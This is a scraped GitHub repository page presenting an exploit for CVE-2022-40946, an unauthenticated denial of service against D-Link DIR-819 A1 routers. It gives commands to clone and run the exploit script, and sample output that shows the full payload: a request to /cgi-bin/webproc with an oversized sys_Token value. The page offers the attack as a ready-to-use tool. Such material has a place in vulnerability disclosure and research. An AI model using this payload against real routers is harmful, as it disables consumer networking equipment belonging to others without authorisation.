Skip to content

Unauthenticated Denial of Service in DLink consumer DIR 819 A1 router

Notifications You must be signed in to change notification settings

whokilleddb/dlink-dir-819-dos

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2022-40946 Exploit: Unauthenticated Denial of Service in DLink consumer DIR 819 A1 routers

Exploit

Fetch the sources

$ git clone https://github.com/whokilleddb/dlink-dir-819-dos
$ cd dlink-dir-819-dos
$ pip install -r requirements.txt

Run the exploit

$ ./exploit.py -i 192.168.0.1                         
[+] DLink DIR-819 DoS exploit
[i] Address to attack: 192.168.0.1
[i] Using SSL:         False
[i] Request Timeout:   30s
[i] Buffer Length:     19
[i] Payload:           http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
[+] Exploit Successful!

About

Unauthenticated Denial of Service in DLink consumer DIR 819 A1 router

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages